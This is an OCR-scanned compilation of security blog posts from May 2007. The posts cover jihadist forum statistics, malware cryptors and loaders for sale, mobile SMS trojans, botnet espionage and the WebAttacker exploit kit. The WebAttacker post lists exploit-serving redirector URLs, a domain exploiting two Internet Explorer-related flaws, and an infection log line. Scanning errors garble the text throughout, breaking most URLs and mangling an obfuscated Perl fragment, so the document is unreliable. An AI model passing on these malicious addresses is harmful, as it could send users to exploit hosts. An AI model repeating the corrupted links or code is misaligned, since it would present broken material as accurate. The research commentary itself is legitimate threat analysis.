web-a p plication-worms.html 
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Unique IP 

addresses 

Region 

Percentage 

Europe 

31.75 

Gulf 

21.14 

Maghreb 

12.81 

Levant 

11.09 

Egypt 

10.33 

Americas 

8.26 

Asia-Pacific 

2.62 


All IP addresses 


Region 

Percentage 

Europe 

27.39 

Gulf 

26.67 

Maghreb 

13.63 

Levant 

11.71 

Egypt 

9.25 

Americas 

6.6 

Asia-Pacific 

2.59 




























Sampling Jihadists f IPs (2007-05-16 01:01) 

[l]Great idea as a matter of fact: 

11 The following is based on an analysis of 4,593 IP addresses 
(1,452 unique IP addresses). The IPs were ac¬ 
quired from 19 of the more prominent of the Salafist/Jihadist 
forums , including both Arabic and non-Arabic forums , from 
01 January through 30 April of this year. 11 

Taking into consideration the per-country stats, do not 
exclude the logical possibility of [2]lP cloaking while 

browsing these and also, the tiny number of intelligence and 
lone gunman info warriors gathering [3JOSINT data. 

In another much more in-depth analysis on mapping the 
online jihad, the authors point out the [4]emerging 

internationalization of jihad as well : 

11 The near exclusive use of the Arabic language in these 
significant jihadi websites likely accounts for the con¬ 
centration of activity in the Middle East and North Africa. But 
with a reach to more than 40 countries, the virtual 

community within these ten influential sites assumes a 
global significance. The international jihadi movement's use 

of the internet to fuel the exchange of ideological expansion 
and its corresponding influx of support will increase the 
vulnerability of many countries to the appeal of extremism. 11 

At least these organizations don't rely on setting up [5]fake 
jihadist communities to come up with the sample 



data, but know exactly where to look for. 

1. http://www.sofir.or a /sarchives/006039. phD 


2. http://ddanchev.blo as pot.com/20Q5/12/ip-cloakin a -and- 
competitive.html 

3. http://ddanchev.blo as pot.com/2006/Q9/benefits-of-open- 
source-intelli a ence.html 

4. http://www.isn.ethz.ch/news/sw/details.cfm?ID=17535 

5. http://ddanchev.blo as pot.com/2007/Q3/cvber-traps-for- 
wannabe- i ihadists.html 
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The Jihadist Security Encyclopedia (2007-05-16 01:41) 
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A month ago, the Media Jihad Battalion started distributing a 
118 pages long encyclopedia on anything starting from 

secure communications to keywords not to search for as 
they'll raise an early warning system alarm. The front cover is 
so [lJBIade's style, but the PSYOPS motive is highly 
influential. Here's a[2] translated table of contents and the 
original version attached. 

1 . 

httD://upload.wikimedia.or a /wikipedia/en/thumb/l/19/Blade 
moviej pg /200px-Blade movie. ipg, 









2. http://online i ihad.wordpress.com/2007/04/Q5/the- 
ultimative-securitv-encvclopedia/ 
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y=Sv+Sq;Sg=g(-1) ; S_ 

Sq]=Sg<SG| |0>{St- 
*Sx+S_]}0S> upda 
;ss#t «g; 


4,he,514) 
cgetSc(bg) ;0S=O 
Sa);map{createLin 
SF?do{open (_, SF) ;rna 
_>} :inap{ Sx=S_;map{ $ 
Sq=S_;St=0;forSv (-1 
||Sv#orSG=Sg;St+=Sg 
SG}}03}forSx(0S)< 
te?m;redo}});Ha 
(SF,SG)=0 


->pack;af 
. . 63; map { S a=2 +8 
eSc(0D);0D=(Sa,0D 
p{Sx=O;roap{g(/0/) ; S 
y=S_;g(l>rand#4)>0S 
..1)<map{Sx=Sp+S_;S 
;}(-1..1)>SN[64*Sp+ 
map{Sy=S_;g+SN[64 
inLoop';s#\s##g 
ARGV;eva1 


Visual Script Obfuscation (2007-05-16 02:10) 

We often talk and deobfuscate scripts aiming to hide their 
real and often [ljmalicious intentions. But what if malicious 
attackers have become so efficient in their obfuscation, that 
they decide to show some [2]JAPH style in order to make 

them harder to analyze by visually obfuscating the scripts as 
you can see here? 

1. http://ddanchev.blo as pot.com/20Q7/Q3/shots-from- 
malicious-wild-west-sample.html 

2. http://www.cpan.or a /misc/ iaph 
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(^Support Intelligence 


Corporate Espionage Through Botnets (2007-05-16 
22:09) 

Following my previous post on [1]0SINTThrough Botnets, 
here's a company that's [2]categorizing Fortune 500 

companies whose networks are heavily polluted with 
[3]malware infected hosts : 

11 Support Intelligence (SI), a network security company in 
San Francisco, has been running what it called "30 

Days of Bots," featuring corporate networks infected with 
spam-churning bots. It began analyzing data in February, 
monitoring 10,000 domains that plow data into a trap much 
like a fishnet, except the intelligence in the data is 

designed to determine what information to keep by looking 
for spam. In total, SI analyzed traffic from more than 100 

sources, including the aforementioned spam traps. 11 

Considering the possibility for gathering open source 
intelligence through military and government infected PCs 
only, 

it is logical to conclude that a specific company can be 
targeted on the basis of the already infected hosts on its 

network as well. Think about it. For the time being, a botnet's 
master doesn't really care if it's a military or Fortune 500 
company that's infected as long as spam, phishing and 
malware goes out of these hosts. But passive corporate 


espionage in the form of intercepting the traffic going out of 
a specific company's network shouldn't be excluded as 

an opportunity. 

1. http://ddanchev.blo as Dot.com/2007/Q4/osint-throu ah- 
botnets.html 

2. http://www.su p port-intelli a ence.com/blo a/ 

3. http://www.esecurit v planet.eom//article. ph p/3675496 
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AhnLab-V3 

2007.5.16.1 

05.16.2007 

no virus found 

AntiVir 

7.4.0.23 

05.16.2007 

no virus found 

Authentium 

4.93.8 

05.16.2007 

no virus found 

Avast 

4.7.997,0 

05.16.2007 

no virus found 

AVG 

7.5.0.467 

05.16.2007 

no vli us found 

BitDefender 

7.2 

05.16.2007 

no virus found 

CAT-QuickHeal 

9.00 

05.16.2007 

(Suspicious) - DNAScan 

ClamAV 

devel-20070416 

05.16.2007 

no virus found 

DrWeb 

4.33 

05.16.2007 

no virus found 

eSafe 

7,0.15.0 

05.16.2007 

suspicious Trojan/Worm 

eTrust-Vet 

30.7.3634 

05.15.2007 

no virus found 

Ewido 

4,0 

05.16.2007 

no virus found 

FileAdvisor 

1 

05.17.2007 

no virus found 

Fortinet 

2.85.0.0 

05.16,2007 

suspicious 

F-Prot 

4.3.2.48 

05.16.2007 

no virus found 

F-Secure 

6.70.13030,0 

05.16.2007 

no virus found 

Ikarus 

T3.1.1.7 

05.16.2007 

no virus found 

Kaspersky 

4.0.2.24 

05.17.2007 

no virus found 

McAfee 

5032 

05.16.2007 

no virus found 

Microsoft 

1.2503 

05.17.2007 

no virus found 

NOD32V2 

2271 

05.16.2007 

no virus found 

Norman 

5.80.02 

05.16.2007 

no virus found 

Panda 

9.0.0.4 

05.16.2007 

Suspicious file 

Prevxl 

V2 

05.17.2007 

no virus found 

Sophos 

4.17.0 

05.16.2007 

no virus found 

Sunbelt 

2.2.907.0 

05.12.2007 

VIPPE,Suspicious 

Symantec 

10 

05.16.2007 

no virus found 

TheHacker 

6.1.6.115 

05.15.2007 

no virus found 

VBA32 

3.12.0 

05.16.2007 

no virus found 

VirusBuster 

4,3.7:9 

05.16.2007 

no virus found 

Webwasher-Gatewav 

6.0.1 

05.16.2007 

Win32.ModifiedUPX.qen (suspicious) 


Yet Another Malware Cryptor In the Wild (2007-05-17 
13:36) 

Just stumbled upon a newly released cryptor in the wild, and 
as I pointed out in a previous post related to [l]yet 

another cryptor, they're signature-based malware scanning's 
worst enemy. By the time AV vendors obtain a sample 

and analyze the routines they use, unless an IPS solution is in 
place, and end user friendly perimeter defense 

detecting the bot-ization of the host are in place - an 
infection occurs. 

What's the big picture? It's launching a denial of service 
attack on anti virus vendors' labs in the form of 

distributing couple of hundred malware samples - future 
[2]family members of a malware group. Polymorphism 







encrypting routines are nothing new, but with DIY cryptors in 
the wild the result can be [3]quite successful even for 

copy cats: 

" Another example is the Stration family of malware, 
responsible for worms and other forms of malware in 

late 2006. " Stration was changing so quickly—the 
encryption packaging, the compiler, everything. We saw up 
to 

300 variants in a single day ," says Ron O'Brien, senior 
security analyst at anti-malware vendor Sophos. 11 
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File size : 4608 bytes 

MD5 : 406e3al443ec617f2c968a957a460fl0 

SHA1 : 187abe8cec588b53126afbe8e600379a3bac2321 

1. http://ddanchev.blo as pot.com/2007/Q3/shots-from- 
malidous-wi Id-west-sample 10.html 

2. http://ddanchev.blo as pot.com/2006/08/malware-bot- 
families-technolo a v-and.html 

3. 

http://www.csoonline.com/read/040107/brf_threat watch.htm 
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Commercializing Mobile Malware (2007-05-18 18:14) 

Visionary enough, [ 1 ]I predicted this over an year ago, and 
despite that for the time being there are only two publicly 
known pieces of mobile malware sending sms messages 
from the infected devices to premium numbers, it's [2]an 

emerging trend for customers and mobile operators to 
[3]keep an eye on : 

" After installation, the Viver trojans immediately start 
sending SMS messages to premium-rate numbers. The 

messages are sent with proper international area codes, so 
they are able to reach the correct destination even when 

activated outside Russia. We've already seen for-profit 
malware in mobile devices: Wesber.A and Redbrowser are 

Java Midlet trojans that try to send messages to Russian 
premium-rate numbers. But these trojans require user 

acceptance per each message and are able to send 
messages correctly only inside Russia. " 

Some comments I made back then : 

" The number and penetration of mobile devices greatly 
outpaces that of the PCs. 

Malware authors are ac¬ 
tively experimenting and of course, progressing with their 
research on mobile malware. The growing monetization of 


mobile devices, that is generating revenues out of users 
and their veto power on certain occasions, would result in 
more development in this area by malicious authors. SPIM 
would also emerge with authors adapting their malware 

for gathering numbers. Mobile malware is also starting to 
carry malicious payload. Building awareness on the the 

issue, given the research already done by several vendors, 
would be a wise idea. " 

Something else to think about is related to Europe's most 
recent mega-music event [4]Eurovision and the sms 

voting power that, given enough infected mobile devices 
are in place the results could change pretty fast if you're 

following my thoughts. Thankfully, compared to zombie 
networks making it possible to do [5]intelligence and 

[6] espionage tweaks given the large infected population, we 
still cannot talk about mobile botnets. The most juicy 

target for the time being however, remains the rise mobile 
banking. 

[7] Another comment I made a while ago : 

" Malware authors indeed have [8]financial incentives to 
futher continue recompling publicly available PoC 

mobile malware source code, and it's the 
purchasing/identification features phones, opening a car 
with an SMS, 

opening a door with an SMS, purchasing over an SMS or 
direct barcode scanning, mobile impersonation scams, 



harvesting phone numbers of infected victims, as well as 
unknowingly interacting with premium numbers are the 

things about to get directly abused - efficiently and 
automatically. " 

Related posts: 

[9] Proof of Concept Symbian Malware Courtesy of the 
Academic World 

[10] Mobile Devices Hacking Through a Suitcase 
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1. http://www.linuxsecuritv.com/docs/malware-trends.odf 

2. http://www.viruslist.com/en/weblo a? 
weblo a id = 20818737Q 

3. http://www.f-secure.eom/weblo a /#00001194 

4. http://en.wikipedia.or a /wiki/Eurovision_Son a Contest 

5. http://ddanchev.blo as pot.com/2007/Q4/osint-throu ah- 
botnets.html 

6. http://ddanchev.blo as pot.com/2007/Q5/corporate- 
es piona a e-throu a h-botnets.html 

7. http://ddanchev.blo as pot.com/2006/Q8/bed-time-readin a- 
s vmbian-os-platform_12.html 

8 . 

http://www.svmantec.com/avcenter/venc/data/tro i an.redbro 

wser.a.html 






























9. http://ddanchev.blo as DOt.com/2QQ6/ll/proQf-of-conce pt- 
s vmbian-malware.html 

10. http://ddanchev.blo as pot.com/2QQ6/Q8/mobile-devices- 
hackin a -throu a h.html 
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Tricking a Laptop's Fingerprint Authentication (2007- 
05-19 22:49) 

[l]The joys of fingerprint biometrics with a [2]duplicate 
fingerprint of the original. 

[EMBED] 

1. http://ddanchev.blo as pot.com/2QQ6/Q6/wheres-m v- 
finaer print-dude.html 

2. http://ddanchev.blo as pot.com/2QQ6/ll/how-to-fake- 
finaer prints.html 
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MySpace's Sex Offenders Problem (2007-05-21 
20:18) 

MySpace, being one of the most popular social networking 
sites is always under fire on its efforts to combat known 

child offenders registering and using its database to find 
what they're looking for. The problem isn't MySpace as a 

faciliator for such type of communications but the vast 
amounts of personal information - future contact points - 

















kids publish about themselves online, not knowing that on 
the Internet anyone can be a dog and most importantly, 
parents 

loosing the emotional connection with their kids and making 
it easier for someone to break the ice and establish trust. 

Several months ago, funded by nothing more but his 
common sense Kevin Poulsen gathered name data from 

the [1]U.S public child offenders registry and found positive 
results with people - thankfully - stupid enough to use 

their real names. And while they wouldn't do it again the 
next time instead of making it easier to aggregate the data, 
a CAPTCHA to limit such automatic activities was 
implemented. 

Don't blame MySpace blame bureaucracy. Meanwhile, here's 
an article on U.S authorities demanding that [2]MyS- 

pace provide data on identified and removed known child 
offenders - they agreed : 


MySpace agreed Monday to provide the information to all 
states after some members of the group filed subpoenas 

or took other legal actions to demand it. The company said 
last week such efforts were required under the federal 

Electronic Communications Privacy Act before it could 
legally release the data. "Different states are going about it 
different ways," said Noelle Talley, spokeswoman for Cooper, 
who filed a "civil investigative demand" for the information. 



Connecticut Attorney General Richard Blumenthal used a 
subpoena that "compels this information right away - 

within hours, not weeks, without delay - because it is vital to 
protecting children," he said. 
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If protecting children is vital, remove the CAPTCHA so 
everyone knowing how to aggregate and tweak the 

data will come up with far more sophisticated stats than the 
ones currently available. Actual results too. Next time it 
would become harder to track them, so don't count on 
measures like these instead, ensure naughty conversations 

aren't taking place at all. Makes me wonder one thing - 
should you be filtering known child offenders on the 
Internet 

perhaps a futile attempt given the pseudo-personalities 
they could establish, or at the ISP level and put them under 

surveillance right from the very beginning? Of course 

[3] child offenders should not have unmonitored access to 
the 

Internet so rethink the basics. 

Related posts: 

[4] Registered Sex Offenders on MySpace 

[5] IMSafer Now MySpace Compatible 
1. http://www.nso pr.aov/ 




2 . 

http://www.forbes.com/feeds/aD/20Q7/Q5/21/ap3742869.ht 

ml 

3. 

http ://news.com.com/Pol ice+Blotter+1 mprisoned + sex+often 
ders+demand + PCs/2100-7348_3-6184088.html 

4. http://ddanchev.blo as pot.com/2QQ6/lQ/re a istered-sex- 
offenders-on-m vs pace.html 

5. http://ddanchev.blo as pot.com/2Q07/Q3/imsafer-now- 
mvs pace-compatible.html 
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A Malware Loader For Sale (2007-05-22 11:46) 

Continuing the [l]Shots from the Malicious Wild West series 
and the [2]yet another malware tool in the wild posts, 

here's a recently advertised malware loader. Polymorphism, 
built in packing functions and the ability to set an interval 
for loading yet another executable at a URL or a URL 
redirector, DIYfirewalls unloading techniques, pretty much 

anything ugly is in place - as usual. The loader's source 
code is currently available for $150, undetected bots go for 
$15 per piece. Malware on demand in principle, or 
[3]malicious economies of scale? 

1. http://ddanchev.blo as pot.com/20Q7/Q4/shots-from- 
malidous-wild-west-samole_25.html 

2. http://ddanchev.blo as pot.com/2007/05/vet-another- 
malware-cr v ptorin-willd.html 


























3. http://ddanchev.blo as pot.com/2QQ7/Q3/under a round- 
economvs-su ppl v-of- a oods.html 
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A Client Application for "Secure" E-banking? (2007- 
05-22 12:17) 

This is perhaps the second [l]product concept myopia right 
after the [2]lie detection software for text comminations 

I come across to recently. Remember a previous post 
[3]heading in the opposite direction, where a bank was 
trying 

to rebuild confidence in the most abused phishing medium - 
the email - to keep in touch with its customers? Here's 

another company that's betting on a third-party client 
application to solve the problem of [4]secure E-banking 
totally falling victim in the [5]secure channel 
communication myopia one that I think has nothing to do 
with reality when it 

comes to the [6]success of phishing : 

II Here's how Armored Online works: A company, such as a 
financial institution or online retailer, offers a downloadable 
client to customers through its website. 

That client then gives the customer's computer a secure 
channel with which to communicate and transact with the 


company . 









Its Java-based browser is locked down, meaning it won't 
accept any plug-ins, like cookies used by criminals. What's 

more, the client can only "talk” to the server at the bank or 
online store. "It's like iTunes for banks," Mr. Sowerby said. 11 

[7]The attack of the disabled cookies? [8]Not really, so [9]be 
realistic. Coming up with a third-party applica¬ 
tion as the cornerstone of E-banking security directly 
conflicts with E-banking's biggest benefit - flexibility due to 
the compatibility with the most popular browsers. So you'd 
rather focus on the current situation - [lOJBrandjacking 

instead of [lljre-inventing the SSL wheel - as a matter of 
fact the [ 12 JGozi trojan and the [13]Nuclear Grabber are 

quite comfortable with SSL as they bypass it entirely. Even 
worse, a [14]trojanized copy of the program will emerge 

given it receives any acceptance at all. And if banks start 
embracing it - don't - we can easily start talking about 

DRM enabled E-banking where, both, banks and customers 
will turn into virtual hostages to a third-party application 

trying to reboot the market for anti-phishing services, totally 
forgetting the problem is not in the lack of unencrypted 
transactions as no one is sniffing the credentials, but 
pushing fake sites instead of letting customers pull the sites 
for themselves. 

Don't disrupt in irrelevance. 

1. http://www.armoredonline.com/ 



2. http://ddanchev.blo as pot.com/2QQ7/Q4/lie-detectin a- 
software-for-text.html 

3. http://ddanchev.blo as pot.com/2QQ6/Q4/headin a -in- 
op posite-direction.html 

4. http://ddanchev.blo as pot.com/2QQ6/Ql/securitv-threats- 
to-consider-when.html 

5. http://www.redherrin a .com/Article.aspx? 

a = 22282&hed = Securitv+With+A+Difference 

6. http://ddanchev.blo as pot.com/2QQ7/Q2/phishin a- 
ecosvstem.html 

7. http://www.londonstimes.us/toons/cartoons/displav.html? 
ima a e-S meon DisabledCookies4. iQ.g 

8. http://ddanchev.blo as pot.com/2QQ6/Q9/bankin a -tro ian- 
defeatin a -virtual.html 

9. http://ddanchev.blo as pot.com/2QQ7/Q5/defeatin a -virtual- 
kevboards.html 

10. http://ddanchev.blo as pot.com/2QQ7/Q5/brand i ackin a- 
index.html 

11 . 

http://news.netcraft.com/archives/2QQ7/Q5/15/internet_pass 
es 6QQQQQ ssl sites.html 


12. http://www.secureworks.com/research/threats/ a ozi/ 

13. http://ddanchev.blo as pot.com/2QQ6/ll/nuclear- a rabber- 
toolkit.html 

14. 

http://www.svmantec.com/securitv__response/writeu p.isp? 



















































docid = 2007-042 705-0108-99&tabid = 2 
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Counter Espionage Tips from the Cold War (2007-05- 
23 20:03) 

There's nothing old-fashioned in short films like these 
representing possible techniques used by intelligence 
services while recruiting -" Cold War counter-spy 
instructional film created to convince government officials 
traveling with top secret info to watch their backs. Watch 
hapless G-men get seduced and setup for blackmail by 
treacherous Soviet 

she-spies " 

[EMBED] 

And despite that today's perception of sexy she-spies has 
evolved proportionally with the technological advances in 

espionage, some of the tips are still emphasizing on the 
basics. 
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Jihadists' Anonymous Internet Surfing Preferences 
(2007-05-23 21:13) 

Jihadists are logically not just interested in [l]encryption 
and [2]steganography but also, in ways to anonymize their 
web surfing activities as much as possible. A wannabe 
jihadist whose tips and recommendations have gained him 



a lot of reputation around the forums I follow, recently came 
up with an in-depth article on recommended and 

reviewed IP cloaking services with direct download links in 
between. It makes [3]stats like these questionable to a 

certain extend as I've already pointed out. Among the [4]IP 
cloaking tools reviewed are : 

- [5]Steganos Internet Anonym Pro 

- [6]Hide IP Platinum 3.1 

- [7]Proxy Switcher Pro 

- [8]lnvisible Browsing V5.0.52 

TOR is, of course, mentioned as well but at the bottom of the 
article citing performance issues compared to 

commercial solutions. [9]IP decloaking is not even 
considered as a concept. 

1. http://ddanchev.blo as DOt.com/20Q7/Q4/mu i ahideen- 
secrets-encr v ption-tool.html 

2. http://ddanchev.blo as pot.com/2006/Q8/ste a ano araphv- 
and-cvber-terronsm.html 

3. http://ddanchev.blo as pot.com/2007/Q5/samplin a- 
j i had ists-i ps.html 

4. http://ddanchev.blo as pot.com/20Q5/12/ip-cloakin a -and- 
competitive.html 

5. http://www.ste a anos.com/ 

6. http://www.hide-ip-soft.com/ 



























7. http://www.proxvswitcher.com/ 


8 . 

http://www.amplusnet.com/products/invisiblebrowsin a /over 

view.htm 

9. http://www.metasploit.com/research/misc/decloak/ 
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Microsoft's Forefront Ad Campaign (2007-05-23 
22:34) 

The introduction of Microsoft's Forefront security solutions is 
already backed up by a huge ad campaign that can be 

seen on the majority of tech-news portals. The campaign is 
however lacking a consistent vision to communicate the 

benefits and main differentiation points - if any - of the 
product, and is barely informing that it exists in a [l]not so 
creative way : 

There's nothing in Forefront that really makes it notably 
better or worse than any other solutions that are 

already in the marketplace. However, the Microsoft name 
may be sufficient for it to steal market share, 

and a better integration with other 

Microsoft solutions...is likely to be a bit of a differentiator," 
said Quin. Faced with increasing competition from 












Microsoft, Symantec Corp. questioned Microsoft's ability to 
effectively protect enterprise customers. 

Trying to be witty too much while fighting ninjas and aliens 
often results in your ad campaign "clowning" in the eyes of 
a prospective customer. 

[2]Security is indeed[3] a cosmic phenomenon for Microsoft, 
an unex¬ 
plained pseudo-randomly generated event that's continuing 
[4]to be researched and analyzed for generations to 

come. [5]Can they achieve desirable results? Will 

[6] penetration pricing help? And will the ad agency that got 

commisioned with the ad campaign come up with a bit of 

[7] a more creative psychological imagination the next time? 
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A pure example of an [8]acquisition-to-[9]solution strategy 
compared to [10]AOLs licensing of a reputable AV vendor's 

technology, in order for them to [lljenter the market 
segment as well. 

1. http://www.itbusiness.ca/it/client/en/home/News.as o? 
id=43360 

2. http://www.eweek.eom/article2/0 . 1759 . 2132724 . Q0.as p? 
kc=EWRSS03129TXlK0000614 

3. http://it.slashdot.or a /article.pl? 
sid=07/05/08/12 26243&from=rss 












4. 

http://www.channelre a ister.co.uk/2QQ7/Q5/Q3/ms_forefront/ 

5. http://ddanchev.blo as pot.com/2QQ6/05/microsoft-in- 
information-secuntv.html 

6. http://ddanchev.blo as pot.com/2QQ6/Q8/microsofts- 
onecare-penetration-pricin a .html 

7. http://ddanchev.blo as pot.com/2QQ7/Q2/bevond- 
tradEtional-advertisin a- packa a es.html 

8 . 

http://www.microsoft.com/presspass/press/2QQ3/ i unQ3/Q6- 

lQGeCadPR.ms ox 

9. 

http://www.microsoft.com/presspass/press/2005/feb05/Q2- 

Q8svbaripr.ms px 

10. http://ddanchev.blo as pot.com/2QQ6/Q6/brace-vourself- 
aol-to-enter-securitv_Q9.html 

11. http://www.ecommercetimes.com/storv/5229Q.html 
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Google Hacking for Vulnerabilities (2007-05-29 
12:31) 

Tools like these are a clear indication in the interest of 
gathering targets through google hacking techniques and 
SQL 

injecting them using a single tool. What's important to note 
is that, instead of scanning the target's web server in an 








































automated fashion thus, increasing the potential of 
detecting your malicious requests in this case the attack 
vectors 

are already known even cached on a search engines' 
servers. Perhaps a good time to set up a [l]google hacking 
or 

[2]PHP deception honeypot, make sure google crawls it and 
either gather first hand statistics, or deceive at your best. 

A paper released under the [3]Know Your Enemy series 
comments on the concept of search engines' 
reconnaissance 


"Below we give the exploits we have seen against our 
honeypots and where possible an estimate of the 

number of users for each piece of software. The estimates 
are obtained by checking the number of Google search 

results returned for a given page in a website, for example 
searching for '"powered by PHPBB" inurkviewtopic.php' 

suggests there are around 1.5 million installations of PHPBB 
indexed by Google." 

Malware using search engines to build its hit lists is nothing 
new and it's the [4]Santy worm and perhaps even 

the [5]JS/Yamanner worm I have in mind. Worms like these 
are 
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just the tip of the iceberg when it comes to malware 
because their successful intrusions act as a propagation 
vector for malware exes, exploits embedded pages, and 
hosting of phishing sites. In case you remember, over an 
year ago New 

Zealand started [6]a nation wide google hacking security 
audit aiming to not just build awareness on the potential 

security issues, but to also, measure the country's 
susceptibility to google hacking which they claim is the 
highest 

in the world. If you don't take care of your web application 
vulnerabilities someone else will, and your organization 

wouldn't even have "the privilege" of getting exploited by 
an advanced attacker, but by a script kiddie making your 
server open a reverse shell back to them in between 
[7]everything else. 

1. http:// a hh.sourcefor a e.net/ 

2. http://www.rstack.or a/phphop/ 

3. http://honevnet.or a/pa pers/weba pp/ 

4. http://www.there a ister.co.uk/2QQ4/12/21/santv_worm/ 

5. http://ddanchev.blo as pot.com/20Q6/Q6/web-a p plication- 
email-harvestin a -worm.html 

6. http://ddanchev.blo as pot.com/2Q06/Q5/nation-wide- 
g oo g le-hackin a -initiative.html 

7. http://ddanchev.blo as pot.com/2QQ7/Q4/compilation-of- 
web-backdoors.html 
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Phrack Magazine's Latest Issue (2007-05-29 16:49) 

Phrack is back believe it or not with its [ 1 ]Iatest Issue 64 
released two days ago. The style is still so old-school, so 
authentic it makes you remember extraordinary Web 1.0 
experiences. Articles of notice I went through so far: "[2]A 
brief history of the Underground scene"; "[3]BIind TCP/IP 
hijacking is still alive" ; and "[4]The art of Exploitation: 
come back on an exploit". Dazzling already : 

" In the last decade, Phrack took a very annoying industry- 
oriented editorial policy and the original spirit was 

in our opinion not respected. The good old school spirit as 
we like had somehow disappeared from the process of 

creating the magazine. That is why the underground got 
split with a major dispute, as some part of the scene was 

unhappy with this new way of publishing. We clearly needed 
to bring together again all the relevant parties around 

the spirit of hacking and the values that make the 
Underground. The Underground is neither about making the 

industry richer by publishing exploits or Oday information, 
nor distributing hacklogs of whitehats on the Internet, but to 
go further the limits of technology ever and ever, in a big 
wave of learning and sharing with the people ready to 

embrace it. This is not our war to fight peoples doing this for 
money but we have to clearly show our difference. " 

1. http://www.ohrack.or g /issues.html?issue=64 





2. http://www.phrack.or a /issues.html? 
issue=64&id=4#article 

3. http://www.phrack.or a /issues.html? 
issue=64&id-15#article 

4. http://www.phrack.or g /issues.html? 
issue=64&id = 13#article 

263 

Reverse Engineering the ANI Vulnerability (2007-05- 
30 01:31) 

Informative video analyzing the [1]ANI cursor vulnerability, 
part of the Google TechTalks series. 

" Alex Sotirov is a vulnerability engineer at determina. He 
will discuss some latest techniques in reverse engi¬ 
neering software to find vulnerabilities. Particularly, he'll 
discuss his technique that lead him to find the ANI bug (a 
critical new bug in WinXP and Vista). " 

[EMBED] 

1 . 

http://www.microsoft.com/technet/securitv/advisorv/935423 

.ms px 
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The Revenge of the Waitress (2007-05-30 12:44) 

Think your scrooge tips will achieve their effect? Think twice 
but don't put the emphasis on underpaid waitresses, 


















rather on the overall availability of [ 1 ]credit card data 
reading devices as well as their vulnerability to such 
readers. 

Here's [2]a video of another waitress donning credit cards 
on the fly : 

" A telltale clue that helped the restaurant and investigators 
zero in on the waitress: She would make quick 

visits to the restroom after picking up customers' charge 
cards, apparently to swipe them through a palm-sized 

device that recorded the confidential numbers. " 

1. http://www.latimes.com/technolo a v/la-me- 
waitress2 2 mav2 2 .1. 6787157 .stor y? 
track=rss&ctrack=l&cset=true 

2. http://ddanchev.blo as pot.com/2QQ7/02/credit-card-data- 
clonin a -tactic.html 
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The WebAttacker in Action (2007-05-30 21:06) 

Interesting to see that the [l]WebAttacker kit can still be 
seen in the wild. Here are the redirectors in action : 

Input URL : _http://rulife.info/traffic/go.php?sid = l 

Effective URL : _http://greencunt.org/crap/index.php 

Responding IP : 203.223.159.110 

Name Lookup Time : 1.290261 












Total Retrieval Time : 5.987628 

= > _ http://rulife.info/traffic/go.php?sid = l 

= > _ http://xorry.org/backup/atds/out.php7s id = 1 

= > _ http://greencunt.org/crap/index.php 

What follows is the (sandboxed) infection : file: Write 
C:\Program Files\lnternet Explorer\IEXPLORE.EXE -> 

C:\sysykiz.exe 

Several more URLs are to be found at the "green" domain as 
well : 

_ http://greencunt.org/anna/fout.php 

_ http://greencunt.org/spll/index.php 

Despite that the tool is outdated compared to mature 
malware platforms and exploitation kits which I'll be 
covering 

in upcoming posts, the leak 
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of its source code made it easy for someone to tweak it for 
their personal needs and simply feed with undetectable 

binaries, new vulnerabilities, and newly registered domains 
- even hijacked ones through web application vulnera¬ 


bilities for instance. 


In case you're interested in a proof that attackers are still 
successfully infecting victims by using vulnerabilities 

for which patches have been released months ago, here's 
another URL that's exploiting two vulnerabilities at once 

namely : 

MDAC ActiveX code execution (CVE-2006-0003) 

IE COM CreateObject Code Execution (MS06-042) 

The domain in question is - _ http://www.avvcc.com and _ 
http://www.avvcc.com/lineage/djyx.htm 

Related posts: 

[2] RootLauncher Kit 

[3] Nuclear Grabber Kit 

[4] Shots from the Malicious Wild West - Sample Seven 

[5] Shots from the Malicious Wild West - Sample Six 

[6] Shots from the Malicious Wild West - Sample Five 

[7] Shots from the Malicious Wild West - Sample Four 

[8] Shots from the Malicious Wild West - Sample Three 

[9] Shots from the Malicious Wild West - Sample Two 
267 

[10] Shots from the Malicious Wild West - Sample One 



1 . 

http ://4. bp .blo as DQt.com/wlCHhTiOmrA/Rd4wewilS9l/AAAA 
AAAAASw/dfaiQVk9Zul/s20Q/webattacker. ioa 

2. http://ddanchev.blo as oot.com/2QQ7/Q2/rootlauncher- 
kit.html 

3. http://ddanchev.blo as pot.com/2QQ6/ll/nuclear- a rabber- 
toolkit.html 

4. http://ddanchev.blo as oot.com/2QQ7/04/shots-from- 
malic1ous-wild-west-samole_25.html 

5. http://ddanchev.blo as oot.com/2QQ7/Q4/shots-from- 
malicious-wild-west-sample_7672.html 

6. http://ddanchev.blo as pot.com/2QQ7/Q4/shots-from- 
malicious-wild-west-sample_20.html 

7. http://ddanchev.blo as pot.com/20Q7/Q4/shots-from- 
malicious-wild-west-sample.html 

8. http://ddanchev.blo as pot.com/20Q7/Q3/shots-from- 
malicious-wild-west-sample_3723.html 

9. http://ddanchev.blo as pot.com/20Q7/Q3/shots-from- 
malicious-wild-west-sample_10.html 

10. http://ddanchev.blo as pot.com/2QQ7/Q3/shots-from- 
malicious-wild-west-sample.html 
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MSN Spamming Bot (2007-05-31 21:20) 










































An image is sometimes worth a thousand words. This is a 
screenshot of infected bots spreading spam messages 

at MSN via typical Ispam [ 1 ]IRC based command and 
control. And here's a related article about [2]malware on IM 

networks as well: 

11 It is not clear exactly why the number of IM attacks is 
increasing, but security researchers have their theo¬ 
ries. Don Montgomery, vice president of marketing at 
Akonix, speculated the increase in the number of attacks 

reflects the increase in the use of instant messaging, 
particularly on corporate networks. 

" IM is becoming favored over e-mail as a distribution vector 
for malware as a result of e-mail security now 

being employed by 75 percent or more of companies, while 
IM security is only employed by 15 to 20 percent of 

companies ," Montgomery said. "The hackers are simply 
turning to the open door. " 

Two options remain highly lucrative. Either someone's 
spamming p3nl $ 

enlargement propositions and directing to a spam site, or 
the [3]social engineering efforts aim at visiting an exploit 
269 

hosting site. No more direct .pif; .scr; or .exe propositions in 
plain simple text, what's exploited is mostly client side 
vulnerabilities and redirectors to break the ice. [4]IM threats 
stats courtesy of Symantec's IMIogic and here's a related 



post regarding [5]the acquisition of the company with 
Symantec anticipating the emergence of this market 
segment 

and investing in it. IM propagation has it cyclical patterns 
which like pretty much all other propagation vectors 
reaching a mature level starts getting at least partly 
replaced by other ways of propagation. 

1. http://ddanchev.blo as oot.com/2QQ7/Q3/botnet- 
communication-platforms.html 

2. http://www.eweek.eom/article2/Q . 1759 . 2138921 . Q0.as p? 
kc=EWRSS03129TXlK0000614 

3. http://ddanchev.blo as pot.com/2QQ7/Ql/social- 
en a ineerin a -and-malware.html 

4. http://tc.imlo a ic.com/threatcenterportal/publframe.as px 

5. http://ddanchev.blo as pot.com/2QQ6/Ql/whats-potential- 
